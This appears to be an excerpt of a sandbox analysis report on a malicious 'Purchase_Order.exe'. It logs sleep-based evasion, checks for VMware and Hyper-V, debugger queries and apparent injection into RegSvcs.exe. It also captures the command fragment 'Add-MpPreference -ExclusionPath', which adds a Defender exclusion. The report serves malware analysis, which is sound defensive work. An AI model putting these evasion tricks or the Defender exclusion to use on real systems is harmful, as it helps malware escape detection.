Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -239000s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -238891s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -238750s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -238641s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -238516s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -238406s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -238297s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -238188s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -238063s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -237953s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -237828s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -237719s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -237563s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -237453s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -237344s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -237219s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -237110s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -236953s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -236844s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -236735s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -236610s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -236469s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -236360s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -236203s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -236094s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -235985s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -235860s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -235735s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -235610s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -235485s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -235360s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -235235s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -235110s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -234953s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -234828s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -234703s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -234594s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -234453s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -234313s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -234188s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -234047s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -233906s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -233781s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -233641s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -233516s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -233375s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -233266s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -233141s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -233016s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -232906s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -232797s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -232688s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -232563s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -232438s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -232313s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -232203s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -232078s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -231953s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5376 | Thread sleep time: -101499s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -231828s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -231719s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -231594s >= -30000s
Source: C:\Users\user\Desktop\Purchase_Order.exe TID: 5500 | Thread sleep time: -231469s >= -30000s
Source: C:\Windows\explorer.exe TID: 4772 | Thread sleep time: -45000s >= -30000s
Source: C:\Windows\SysWOW64\systray.exe TID: 4580 | Thread sleep time: -44000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\systray.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 239844
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 239656
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 239531
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 239422
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 239313
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 239188
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 239000
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 238891
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 238750
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 238641
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 238516
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 238406
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 238297
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 238188
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 238063
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 237953
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 237828
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 237719
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 237563
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 237453
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 237344
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 237219
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 237110
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 236953
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 236844
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 236735
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 236610
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 236469
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 236360
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 236203
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 236094
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 235985
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 235860
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 235735
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 235610
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 235485
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 235360
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 235235
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 235110
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 234953
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 234828
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 234703
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 234594
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 234453
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 234313
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 234188
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 234047
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 233906
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 233781
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 233641
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 233516
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 233375
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 233266
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 233141
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 233016
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 232906
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 232797
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 232688
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 232563
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 232438
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 232313
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 232203
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 232078
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 231953
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 101499
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 231828
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 231719
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 231594
Source: C:\Users\user\Desktop\Purchase_Order.exe | Thread delayed: delay time: 231469
Source: explorer.exe, 00000007.00000000.287460148.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000007.00000000.287460148.0000000008A32000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000000.288044675.0000000008CC6000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000007.00000000.288076974.0000000008CEA000.00000004.00000001.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000007.00000000.278193796.00000000048E0000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.263912988.0000000000F73000.00000004.00000020.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: Purchase_Order.exe, 00000000.00000002.259691374.0000000002B20000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000007.00000000.287675555.0000000008B88000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000007.00000000.287548556.0000000008ACF000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000007.00000000.282879554.00000000069DA000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD002
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000007.00000000.311478350.00000000059C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Purchase_Order.exe | Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\systray.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004088B0 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00409B20 LdrLoadDll,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01294120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01294120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01279100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01279100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_01279100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0127C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0127B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0127B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0129B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0129B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012999BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0129C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012AA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_013041E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h]
